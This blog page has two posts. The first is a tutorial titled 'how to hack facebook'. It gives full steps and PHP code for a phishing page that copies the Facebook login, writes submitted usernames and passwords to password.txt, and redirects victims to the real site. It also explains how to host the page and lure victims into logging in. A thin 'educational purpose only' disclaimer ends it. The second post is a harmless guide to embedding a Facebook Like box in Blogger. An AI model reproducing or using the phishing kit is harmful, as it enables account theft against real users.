Showing posts with label Facebook. Show all posts
Showing posts with label Facebook. Show all posts
how to hack facebook
Hello friends....!! From many days I am getting many messages in my inbox on how to hack a Facebook Account. Most of the people are curious to know how hackers take control of their accounts. Here in this post I am going to tell you how to hack a Facebook account and explain one of the popular and easiest attacks called "PHISHING".
Phishing is one of the popular hacking techniques used by hackers to lure victims into giving their login credentials. Phishing Webpage: Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website and letting them to login in the fake webpage and leaking their login credentials ( userID and password ). Let me now explain how to create a Facebook phishing page.

Steps to make a Fake/Phishing Facebook Login Page :-
For your simplicity I have uploaded the required files. You can download them from the given below link and then follow Step 5 onward. You can also make these files yourself by following the steps below.


1. Go to www.facebook.com ( Login Page ) and right click on website => Select "View source" and copy the whole code to notepad ( Press Ctrl+A then Ctrl+C. Then open notepad and press Ctrl+V ).



2. Now search ( Press Ctrl+F ) for keyword "action" in that code. You fill find the code like this: action="https://www.facebook.com/login.php?login_attempt=1".


Here, let me explain what "action" means to. If you have some basic knowledge of web applications, then you already know about that "action" is a HTML attribute that specifies where to send the form-data when a form is submitted. In the above code, the action attribute has the value that points to Facebook login.php file ( https://www.facebook.com/login.php ). So when a user clicks the login button, it will send the data to the login.php page. This .php file will check whether the entered password is valid or not. To capture the form-data, we have to change the action value to our php file. So let us change the value from action="https://www.facebook.com/login.php?login_attempt=1" to action="login.php". Save the file as index.html.


3. Now, let us create our own login.php file that will capture the entered data and redirects to original Facebook page. Open the notepad and copy the following code:

<?php
echo "<html><body bgcolor='#141823'>There Was some problem please try again</body>";
header("Location: http://www.facebook.com");
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
echo "<script>document.location='https://www.facebook.com/login.php?login_attempt=1';</script></html>";
exit;
?>

Save this file as "login.php"



4. Open the notepad and just save the file as "password.txt" (without any contents).

5. To host your phishing page, you may need a Web-hosting. You can create a free account in any free web hosting providers. Following are best available free Web-hosting sites :-


Once you have created account in free hosting site. Now upload those three file ( index.html, login.php, password.txt ) in the free Web-hosting site.

Upload files to Web-hosting site :-

1. Login to your Web-hosting site and search for cPanel or Settings.
2. Search for File Manager open it and upload the files there.


Your files can be viewed by visiting URL provided when you create account. For example : "yourusername.webhostingdomain.com". Make sure your fake page is working or not, by visiting your URL.


Hack someone’s Facebook Account :-

1. Now, you have to lure your victim to Login into your phishing page by sending them your Phishing page URL i.e. "yourusername.webhostingdomain.com". ( You can lure your victim by telling them to like the page )

2. Once they login into the phishing page ( i.e. they enter their login credentials ), their account is hacked.

3. Now to see the victims userID, Password; login to your Web-hosting account and open "password.html" file to see the victims user id and the password.


Enjoy....!!


Note: The above article is for educational purpose only.



If you face any problems then you can leave a comment below....we will get back to you as soon as possible. :-) :-)


A Facebook Like box is a great and most useful plugin to increase the likes of your fan page, increase blog visitors, and allows to blog visitors to subscribe your blog updates through Facebook Like box. Facebook Like box display the faces of the likers into a Facebook like box on Blogger. The Like Box is a special version of the Like button designed only for Facebook Pages. In other words It allows admins to promote their Pages ,increase there likes ,visitors and embed a simple feed of content from a Page into other sites. Before creating a fan or like box make sure that you should be require Facebook Page.


Creating a Facebook Like :-

1. Firstly open the Facebook page which u want to add like box to blogger and copy the URL from the address bar of your facebook fan page. You can see the screenshot of URL that how should look like....


2. After that open this link  https://developers.facebook.com/docs/plugins/page-pluginPaste your page URL into the facebook page URL field, change or modify the width and and height of the box by changing there values, chek or unchek the boxes according to your wish on how you want your like box to look like as shown below in the screenshot....


The configuration above doesn't include all of the possible settings for your Like box. You can also change the following default settings....


3. After filling all boxes and checkboxes if you are satisfied with the preview, click on the "GET CODE" button.




4. After clicking on the "GET CODE" a big box will pop-up titled "Your plugin Code"  containing two pieces of some code in two different boxes. Select the second piece of the code and copy it as it is, as you can see in the screenshot below....


Add the Facebook Like Box to your Bolg :-

5.  After doing the above procedure, now login to your Blogger Account after that go to "Layout", and then click on "Add a Gadget" link....



6. When you click on "Add a Gadget" you will get a pop-up window will be appears, after that scroll down and  select the "HTML/JavaScript" gadget, after that one pop-up box will be open again....

7. Paste the whole code which we copied for Facebook Like box in the empty HTML box. You can fill the Title box with your choice or you can leave this box blank and click on the save button....


8. Now refresh your blog and now you see your Facebook Like box like as screenshot shown below....


Now you are done..!! Enjoy..!!

If you have any problems then you can leave a comment below....we will get back to you as soon as possible.. :-) :-)